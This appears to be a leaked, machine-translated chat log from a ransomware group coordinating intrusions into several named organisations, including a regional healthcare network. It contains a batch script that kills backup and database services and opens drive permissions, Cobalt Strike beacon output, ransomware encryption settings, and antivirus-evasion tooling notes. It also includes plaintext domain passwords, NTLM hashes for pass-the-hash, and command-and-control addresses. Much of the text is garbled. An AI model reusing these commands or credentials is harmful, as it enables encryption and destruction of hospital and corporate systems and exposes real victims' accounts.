how will it work without smb? for example diskshare...psezek? but what's that to us dastmik also does not work[ ](https://mediaeveryone.com/channel/general?msg=3xDH4WufyJHjSg3X6) now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535)mb port have changed[ ](https://mediaeveryone.com/channel/general?msg=Jy7qoefNuXnWSgxhx) thoughts on the subject? these remained+tok with the backups listings left in the water
can not remove because there is no rdp or smb ports loaded on megutak what do you have?
SekA because the mode is off and you haven't slept muchA very bad idea Everyone's been up since 8 am But the lightning stop
he wanted to close the gtagB rtpcompany wrote tl1Till 00 work I got it right? in half an houre soon to be demolished guys who have something important left in tpc take it awayunderstood it will skip at the next attempt to network location as soon as the file location process starts on it hangs the flag immediately no?
it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process
but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so
for example from a SYSVOL balloon which is available by default to all machines domainedr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares disks
"C:\Windows\system32\net1 stop \"samss\" /y"
"C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""samss\""/y"
"C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F"
"C:\Windows\system32\taskmgr.exe\"" /4"
"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"
"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"
"icacls \""C:\*\" /grant Everyone:F /T /C /Q"
"icacls \""D:\*\"" /grant Everyone:F /T /C /Q"
``This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work da, does it alreadyDep came?
172.241.27.18
https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460
TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
``Let's keep looking for access to the population parral'naya guys uchut access to nas+1obuschem how to get into trusts in #wilsonart-com:space_invader:who do what? helloThank you guys, please throw sharkhromium build can certainly login with rockyu let ...what other exploits can try under ftp?
anonomus and login with passwords you found does not work
10.103.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready.)

10.103.1.19:21 (220 NET+ARM FTP Server 1.0 ready.)

10.100.1.107:21 (220 Microsoft FTP Service)

10.100.1.25:21 (220 Microsoft FTP Service)

10.100.1.11:21 (220 Microsoft FTP Service)

10.100.1.4:21 (220 Microsoft FTP Service)

10.109.1.51:21 (220 ET0021B73B05EA Lexmark M3150 FTP Server NH63.CY.N640 ready)

10.100.20.15:21 (220-FileZilla Server version 0.9.44 beta)

10.104.1.13:21 (220 AP9630 Network Management Card AOS v6.0.6 FTP server ready).

10.101.1.6:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.101.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.106.1.54:21 (220 POSOfficeInvoice Lexmark M3150 FTP Server NH63.CY.N640 ready.)

10.106.1.15:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.106.1.9:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.122.1.47:21 (220 ZBR-79071 Version V75.19.10Z ready.)

10.122.1.50:21 (220 EFI FTP Print server ready.)
``````
[-] 10.103.1.108:445 - Host does NOT appear vulnerable.
``````
10.103.1.108:445 (platform: 500 version: 6.1 name: BL19 domain: ORANGE_FACT)
10.250.1.41:445 (platform: 500 version: 6.3 name: CFD01 domain: ORANGE_FACT)
10.109.1.21:445 (platform: 500 version: 6.3 name: TL02 domain: ORANGE_FACT)
10.100.20.15:445 (platform: 500 version: 6.3 name: OC40 domain: ORANGE_FACT)
``user8 add @user8 to the chat room I'm the only one here now)
can I have
slypad.com:443 who pass? there is a session, most likely goes to `CORPSFEAPP05 ` as will be turned on the VPN check the `CORP.TELEVISA.COM.MX\cguerrerobo Televisa *2020 ` did not have time to check the cress, turned off the VPN-as the other mount, which I did on the server does not roll? or he never came + putzakrepreshit hangs yesByla would not miss the sparrows.I confused with balya stopya see in the cob session from there hangsa why bother me and the extra light zakrepnu tell me thatThere is no time, valenok at the computer includes vpn for a couple of minutes. As soon as we jump I'll reporta only 1perekiruyte on the server somewherePulni plzodaZakrep weighs? -little if@tl2 @tl1 and at least some hashik unloaded ?VPN enabled for a short time.Here progress not much, looking for an accessible server that would hook up, unloaded Firefox now will look at the deadic, maybe any accesses will find#sccy-com
#ballymoregroup-com
and something else I'm not privy to. What's in the works today? I'll keep you posted on how it goes from here, most of the servers are off, the ones that aren't are encrypted...have you checked the old network? hi) everyone, did the deadic pull up, but otherwise no[ ](https://mediaeveryone.com/channel/general?msg=egNgG9m4nGZggDsk2) nothing ?[ ](https://mediaeveryone.com/channel/general?msg=5hJjTn62neuBcoHf4) intrigued... And an hour has passed alreadyNo fly sessions did not help in an hour, all together we will get together on a small bering about the next week but in general they may not need soonernae anything)on zakrepov .... a zakrepov? + updated the files in tours, there Detect 4/23 on the dynamics instead of 9/23started these two ways ``
regsvr32 file.dll
rundll32 file.dll, StartW
``Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well
but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at least by tulsam, dudes come by, but computers are not domain so it's hard to get there. i have dumped hashes tl2, maybe when will unload ...on sccy silence? i have a tv and user7 helps
sccy in pcsb we troetools cleaned? 1 with tv and 1 with pcsb? the same as yesterday) who's working with what today?:space_invader:hi all hello tomorrow by 6 restful to tomorrowDo horses) user1poka off, alas there kerbs, you could have a shitload of ita farm is still off? add more @user1otleetela
i did not take any unwanted action last 15 minutes before i died on ms17-010 empty
beacon> shell net localgroup administrators
[*] Tasked beacon to run: net localgroup administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dennadmin
dennisadmin
localadmin
ORENCO\Domain Admins
The command completed successfully.


beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
0renco ADadmin ADAM_OrencoAD-LDS
ADCS-CertSvc ADCS-NDESSvc ADCS-WebSvc
bdehaven bmehrabian esherman
ExchangeAdmin hodges JLyons
jperez mark.dupuis SCCM01$
sdawson
The command completed successfully.


beacon> shell net group "Enterprise admins" /dom
[*] Tasked beacon to run: net group "Enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
095 bmehrabian ExchangeAdmin
hodges
The command completed successfully.
``tl2otuser9 I don't have it handy((
ask @tl1 he has an account there too can you give access to the service, which is similar to virustotal?  Check dllkiok)) hello. It should ask @user3. I have not kept track of them - they change so often)) hello, and remind me the link to our forum, please take a mail, fs, social networks look more and you have looked at the technicians all? brutal did not give anything (brutalized esx looking for a web mordas to rub the backups there is movement? -[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=X2EtTJvtHPYtbkq7a) @tl1 have you run into this? took a screenshot of the admin desktop
there was an etp console open, he was just restoring
No credits.
He stole a cookie and then he logged in.
10.1.0.170
```
because they go by ip https://10.1.0.170/web/bin/index.html and only one user tell me where you find it now how did you see it?) there is another backup system Rubrik
not cloudy not a clue here ... you need to automatically generate all combinations with pass and cvr+special characters, the guy has passwords like - pass123 pass123@ passl23# and so on random password generator? you ask about a password manager? What's a tool that generates passwords based on a pattern i checked, but i couldn't find them.
look at the sphere ... you did a scan of the network how did you find them? ie fucked up only in esx? what do you mean completely?
i see there fs and everything is shifty there is available? if not you are wasting your time is vim server available?
Cool2002!
@#Jackson09!
V8tundra!
!@#monstrosity2002!
crisp31015
cool2002
JbQp3Fjq9mUa
EvaiKiO1!

``https://github.com/Arvanaghi/SessionGopher```
	 * Username : rthomas
	 * Domain : MAIN
	 * Password : !@monstrosity2002
``2 what part was it? no, these are not in adiz* of them? didn't understand the question, for them?[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=Ycb785mrfeQYmw9LH) some part for them? some in the domain were they in the domain? yes? forgot them?)``
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
``````
MAIN\Administrator cr1spy173
MAIN\Allscripts_Admin crisp1234
MAIN\AllscriptsSQL Cr1spy173
MAIN\htservice Hyp3rtap3
MAIN\meditech-admin meditech12
MAIN\meditech meditech12
MAIN\nodom Miranda22
MAIN\dragon Cr1spy173
MAIN\jwashburn1 Nestlr99
MAIN\pbodrey rocket48
MAIN\smaxwell retire17
MAIN\ashleys Ashley!23
MAIN\rlagrone goose2001
MAIN\spf_svcs cr1spy173
MAIN\helpdesk Crisp@123
MAIN\blove wingnut12#
``1.done.CRISPREGIONAL.ORG thank you bbbbok))) you go to 12 you can go satiitogo +4 hours on top of everything zbsagaSame went after the latch 1742 gbnet what did you do?the process went faster1742 gb or through ehei and then try to limit the size and run separately to the folder again check av and vindefmonitor this casebut in 3 hoursI'm trying to get on the rdp to the server from which you can go to the admin officeao, the file is 500 gb changed the extension of what?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bgPCbwvFmfMwjop8L) kobadai access to the coba still check the aver to startParameter in the argument??[ ](https://mediaeveryone.com/group/crispregional-org?msg=j2fFkWHhYy2nrZtpa) inject, with the parameter E:\ -size 25 and then put dll again on the backpack admin maqafi suddenly turned on and before that the exe was ok? processes hangs on? see the maqafaa what is it? it is demolished start it throw the exe
beacon> shell dir C:\
[*] Tasked beacon to run: dir C:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 88D0-688E

 Directory of C:\

01/22/2021 01:06 AM 1,558 .rnd.YHCWU
01/22/2021 01:06 AM 1,790 Dailly Backup_Subplan_1_20160715120154.txt.id-B4E852BA.[emailme@italymail.com].arena.YHCWU
01/22/2021 01:06 AM 14,885 eula_en.txt.YHCWU
12/30/2015 08:47 AM 66 install x64.bat
01/22/2021 01:06 AM 10,815 legal_notices.txt.txt.YHCWU
08/22/2013 10:52 AM <DIR> PerfLogs
01/22/2021 01:07 AM <DIR> Program Files
01/22/2021 01:07 AM <DIR> Program Files (x86)
01/22/2021 01:06 AM 3,194 RakhniDecryptor.1.21.2.1_15.10.2017_23.13.34_log.txt.YHCWU
10/15/2017 10:13 PM 5,463,192 RakhniDecryptor.exe
01/22/2021 01:06 AM 930 readme.txt
01/22/2021 01:07 AM <DIR> Users
01/22/2021 01:07 AM <DIR> VBRCatalog
01/22/2021 01:07 AM <DIR> VeeamBackup&Replication_9.5.0.1038.Update2
01/22/2021 01:07:07 AM 679,073,953 VeeamBackup&Replication_9.5.0.1038.Update2.zip.YHCWU
01/22/2021 01:07 AM 2,158,762,518 VeeamBackup&Replication_9.5.0.823.Update1.iso.YHCWU
01/22/2021 01:07 AM <DIR> VeeamFLR
01/22/2021 01:07 AM 1,913 veeam_backup_perpetual_32_0.lic.YHCWU
01/21/2021 11:26 PM <DIR> Windows
01/22/2021 01:07 AM 10,576 zabbix_agentd.conf.YHCWU
01/22/2021 01:07 AM 664,700 zabbix_agentd.log.YHCWU
01/22/2021 01:07 AM <DIR> Zabbix_x64
              13 File(s) 2,844,010,090 bytes
               9 Dir(s) 20,071,145,472 bytes free

``or the exe file in the root of the drive dlli look at the root of the disk I can't answer you this srevak did user9 and all conversations will be about him I care about this server here? Where did you run the exe file? fuck+[ ](https://mediaeveryone.com/group/crispregional-org?msg=YHZuQdkuoSaaD7kQy) from here the 500gb file changed its extension?
*{\] Tasked beacon to run: dir E:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive E is Backups
 Volume Serial Number is 1AB1-05F7

 Directory of E:\

01/22/2021 02:37 AM <DIR> American HealthTech
01/22/2021 02:41 AM <DIR> Cobian
01/22/2021 03:01 AM <DIR> Corepoint
01/22/2021 03:01 AM <DIR> Corepoint DB Cluster
01/22/2021 03:01 AM <DIR> Deleted 3M CDIS Old
01/19/20/2021 08:42 PM <DIR> Deleted Allscripts Pro
01/21/2021 01:01 PM <DIR> Deleted FollowMyHealth
12/30/2020 02:46 PM <DIR> Deleted IPS Servers
01/21/2021 12:05 PM <DIR> Deleted Meditech MU Servers
01/21/2021 01:03 PM <DIR> Deleted Meditech OlahPDFViewer
12/30/2020 02:24 PM <DIR> Deleted Meditech Servers
12/30/2020 03:16 PM <DIR> Deleted Old vCenter Servers
12/30/2020 01:42 PM <DIR> Deleted Redoc
12/30/2020 03:29 PM <DIR> IPeople Servers
10/15/2019 07:10 AM <DIR> IT Infrastructure Servers
12/30/2020 12:36 PM <DIR> Kronos
10/15/2019 08:14 AM <DIR> Meditech Server Snapshots - 1 Time
05/12/2020 01:27 PM <DIR> ProgramData
08/05/2018 09:07 PM <DIR> Provation
01/22/2021 01:06 AM 930 readme.txt
05/15/2020 09:01 PM <DIR> VeeamAgentUser6940465c-6f53-11e8-9c43-bc0000e00000
10/06/2016 09:00 AM <DIR> VeeamConfigBackup
               1 File(s) 930 bytes
              21 Dir(s) 5,198,023,389,184 bytes free

``I'm interested in its total say and free spaceday dir E:\ Pure bullshit! But there is clearly more said 30 min = 1tbrealistically a long time so, you have backups on the wine server and there you have a session? I do not understand you, I am on this PC) Where do I take it? Ie you also ran the build there? disk with backups attached or notbear> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

There are no entries in the list. It shows the attached disks see if there is no 2 TB Voz can be attached somewhere, I did not do it.The disk is attached? how much is the total size occupied? It goes on a small size there is movement? if not, let's run with -size25 or stands in place there is movement on the files? -size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
In this case, the database is encrypted at 100%, the files in the vm at 20% regardless of the value of the parameter.there close and all day Saturday bye)and Saturday will be finished tomorrow at work time #ballymoregroup-com weekend is the ssk?)but the weekend will be freemax at 9[ ](https://mediaeveryone.com/group/crispregional-org?msg=G9La729RHc5vft2wr) can be later? sleep 6 hours then the rest of the houseI will stay for how long so come later and 8 + H for those who stay8 for everyone today? how late? so who stays tonight? so whoever stays tonight will just call to check, there's no need for everyone to stay home the rest can go home the main thing is that the syntax is correct yes, with that, but I think it should work faster with 15 give me a brainstorm)you ran it yourself then I don't know I ran it with "-size 15 e:\" from the neighbor's one
is the syntax correct? no files are not changed? does it still have 500gb files on the first folder? is there a live process hanging? are the folders not fully encrypted?to gpd 20-2000gb files and in these folders less than half of the files half of the folders are only small files so far on the second passed 1 disk how many files passed on the backups? das logonscripts finished? on wine servers for example cut off) just then the point of cutting it) and polozak throwing out?
i just see that gpupdate is still hanging on the user
it means he did not accept the update and windef is still on if you force it within 5 minutes to ask about windef
it's not like it's turned off or something.
when you force a gpapdate, it gives the user an alert that the update is applied after it will exit8 tbhad to wait for backups
there are 160 servers in hell
alive 99
closed 99

1,550 armies by hell
479 alive
we unshared the disks, unshared the exe, put it in the logon copy and start exe

the center\nasys have been wiped out
backups in progress
``````
NOVANET
``````
TRINISYSQA-DB
RINISYSQA-APP
``````
CRRHPOMC4
PYXIS-CCE-TEST2
NTOPCERNER
PYXIS-CCE-TEST
3MCDISTEST
NOVANET
IT-ADMIN
ATCOMM
MEDMANAGER
CINTAS
IT-INFO
``Then we're ready to run it? Tell me when you're ready Don't run it yetDiscuss the processes\kil, just run it
rub one nasa what's left? have you got many left? have you not started yet?
```
Trinisys-A3
Trinisys-A4
Trinisys-A5
Trinisys-A6
Trinisys-A7
Trinisys-A8
``````
CRANEWARE
NTOPng
OMNICELLOld2
``````
itunitynas.main.crispregional.org NAS zamakat \backup,
``````
CorepointMSFTCluster
CorepointSQL
CRANEWARE
crhs-security
CRHSVIEWSECSVR
DIV5
MTSCA
NTOPng
OMNICELLOld2
PYXIS-CCE-PROD
Trinisys-A3
Trinisys-A4
Trinisys-A5
Trinisys-A6
Trinisys-A7
Trinisys-A8
VISONEX
``did not attract
```
10.1.20.250
10.1.20.197
10.1.20.124
10.1.0.40
10.1.20.127
10.1.20.198
10.1.20.162
10.1.0.80
``In that case you format it if they are files of the current machine then do not delete only snappsDo you have virtual machine disks are files?
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173
pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b
pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe
pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826 wingnut12#
pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92
pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa
pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece
pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc
pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb
pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca
pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07
pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16
pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef
pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742
pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e
pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6
pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24
pth MAIN\helpdesk 0219040d969400d4253ff874683fd9f8

``````
https://crhsvcenter7.main.crispregional.org/ui/

Administrator@main.crispregional.org
cr1spy173
``don't forget to drop the process of whining on the servers, etc@user9 coordinate on the networkn hope vindef not cut, let's so can prescribe in the logon script kst ports 7/9 are also closed everywhere, it seems standard for vol``(D)*FY&(GSDGUVIIYSDOF*^RS*GUTSBG (wakemeonlan not see switched off compounds, but it also falls off
the problem is that the jump generates an echo and we have no signature certificates in cobalt
may react to it and the old one was not there and the old one was deleted? if anything, EXACTLY the script was imported) on the rdp I sit where the jump did not see the notefna jump burned but defender should not stalid ... did not steam today at least not yet) aha seriously? should be cleaner everything is very relative defender steam it) how long does it take for you to reach the jmp?) it works? >* Beacon's 'jump psexec' and 'jump psexec64' commands[ ](https://mediaeveryone.com/group/crispregional-org?msg=ALXZw7dvyA8RBwDCf) yes) or it generates loads itself when you jump and so?[ ](https://mediaeveryone.com/group/crispregional-org?msg=KhnLLye6nY4zyhk2C) is it? yes?
how to generate? everything? lol))you have to start a new one lol) no, you have to start a new cobalt and not take a script from it and add it to the old one? you have to add it to the script manager[ ](https://mediaeveryone.com/group/crispregional-org?msg=c5aken5Ld6PtdbKDC) and you can't use it? @user9 because you start it with the old startup, not through the hooke me ok
In the package in the folder
	Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/
is artifact.cna which must be imported into cobalt to generate internal native loads and staged loads to run.

``Booted so I wrote 15 = 0da and 13 ok just 13 is not as easy to install as 15``(S)*YD(F&T*^SDUYGfDSI&%FUHIG^7` if 15 is bullshit) yes15jdk13
installing the right Java :
	sudo add-apt-repository ppa:linuxuprising/java
	sudo apt install oracle-java15-installer
	
	java -version
	java version "15.0.1" 2020-10-20
	Java(TM) SE Runtime Environment (build 15.0.1+9-18)
	Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)
``Upgrade only from Java 13. Don't be so quick to unshackle your flesh, let's update yours pure and pristine``
206.221.188.106:63254
edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj
``````
206.221.188.106
```
any coba creeds left? can't find it any cleaner than our dlls from tulspanel``.
Artifact Kit is used in the following cases :
	* Attacks -> Packages -> Windows Executable
	* Attacks -> Packages -> Windows Executable (S)
	* Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe)
	* Beacon's 'elevate svc-exe' command
	* Beacon's 'jump psexec' and 'jump psexec64' commands
``it's artifact kitego windef not trett e now you can go through jump) what do you mean it cleans? are we going to do it now? we have a coba update that cleans jump and also coba here to work start with servers, dk last but not least@all pull all servers here anyway it's about ARM If you drop AV then so you can turn off windef and unpack exe then work nope no idea but it seems like we would have found it
disconnect the policy and form did not find? at least one of the monitors stand you two next to each other will sit in the same window or what? ok@user7 help with AV and we will close only some policies are not available, i tried under different admins just disconnect there? in the policies, there are a million there found?look for disconnect but do not disable it then all ok+ in other folders machine with the tag server144 in the folder servers100+ clearly there should be how many servers there at least approximately or type of servera what filters do you need? look filters you went there or screenshots?[ ](https://mediaeveryone.com/group/crispregional-org?msg=zNs3B7SRGt4HC7Cu8) how many I do not see, but I see that there are many, probably all
at least all servers and give me a shellcode are all pk's running there? no, i think all of them) here's a freshly built dll then + and there processes die in 30 sec? not all servers i checked, where i looked - they knock in it-admin, this server is macaffi cloud? and where they knock? yes everywhere is macaffi, just somewhere direct client and where some scanners check not through edr_q51B↩zeguya especially in the console av not looked into
no one has downloaded the dll, i will check if i have it everywhere, can't i download the build? interesting fact you threw in) by the way, the session dies in 30 seconds
freshly built dll
i'm not sure if all servers are av managed from konosli makaffi 20 mina should be reddish on the same sabinet? on the net how? on the dedik was a few komponu were yellow, became green) do not like it i think) WakeMeOnLan
I ran a fordcast on the deck, there were a few computers, they kinda woke up and what was the wol and how did you test?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bvAFBp2D3sBPThK7z) I looked there) they're always ready
wol tested, it seems to work on rdpodgotovil WOL software, shredders, batniks, etc? user4user8user7user3 then work but there is nothing) there is an option edit cloud from the top left like a menu item look lagia unleashed10.1.20.183 MAIN\blove wingnut12#
206.221.188.106:52786 give me access and sostam what do we have? the first 3 items on the left look at the settings) now their computers are off
in bludhoudn two computers with active sessions YES, in addition to dkne, you need to reserver admin, well only
```
  TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676
and ``and also, the backup process does not always keep the connection open+and the pid is the same? on the pid, well it is not there, so it does not knock) there is no processa as you understood?
Active Connections

  Proto Local Address Foreign Address State PID
  TCP 0.0.0.0:111 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756
  TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:1063 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1644
  TCP 0.0.0.0:2049 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3160
  TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:6160 0.0.0.0:0 LISTENING 1900
  TCP 0.0.0.0:6161 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:6162 0.0.0.0:0 LISTENING 2352
  TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676
  TCP 0.0.0.0:6170 0.0.0.0:0 LISTENING 5300
  TCP 0.0.0.0:6172 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:6190 0.0.0.0:0 LISTENING 2392
  TCP 0.0.0.0:6210 0.0.0.0:0 LISTENING 2176
  TCP 0.0.0.0:6290 0.0.0.0:0 LISTENING 2392
  TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 1232
  TCP 0.0.0.0:9380 0.0.0.0:0 LISTENING 1924
  TCP 0.0.0.0:9381 0.0.0.0:0 LISTENING 1924
  TCP 0.0.0.0:9392 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:9393 0.0.0.0:0 LISTENING 4276
  TCP 0.0.0.0:9396 0.0.0.0:0 LISTENING 3680
  TCP 0.0.0.0:9401 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:9501 0.0.0.0:0 LISTENING 3692
  TCP 0.0.0.0:10001 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10002 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10003 0.0.0.0:0 LISTENING 4676
  TCP 0.0.0.0:10005 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10006 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 1848
  TCP 0.0.0.0:11731 0.0.0.0:0 LISTENING 1900
  TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 540
  TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 864
  TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888
  TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 640
  TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 640
  TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 1036
  TCP 0.0.0.0:49203 0.0.0.0:0 LISTENING 632
  TCP 0.0.0.0:49204 0.0.0.0:0 LISTENING 3192
  TCP 10.1.20.183:139 0.0.0.0:0 LISTENING 4
  TCP 10.1.20.183:301 10.10.1.69:2049 ESTABLISHED 1900
  TCP 10.1.20.183:302 10.10.1.46:2049 ESTABLISHED 1900
  TCP 10.1.20.183:303 10.10.1.43:2049 ESTABLISHED 1900
  TCP 10.1.20.183:305 10.10.1.43:2049 ESTABLISHED 1900
  TCP 10.1.20.183:445 10.1.20.113:65195 ESTABLISHED 4
  TCP 10.1.20.183:3389 192.168.9.179:55814 ESTABLISHED 3160
  TCP 10.1.20.183:9392 10.1.20.183:60589 ESTABLISHED 3316
  TCP 10.1.20.183:9396 192.168.9.179:58127 ESTABLISHED 3680
  TCP 10.1.20.183:9396 192.168.9.179:58869 ESTABLISHED 3680
  TCP 10.1.20.183:10050 10.1.200.69:32768 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32786 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32880 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32882 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32972 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33010 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33036 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33246 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33266 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33464 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33764 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33942 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34178 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34238 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34372 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34542 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34682 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34696 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34866 TIME_WAIT 0
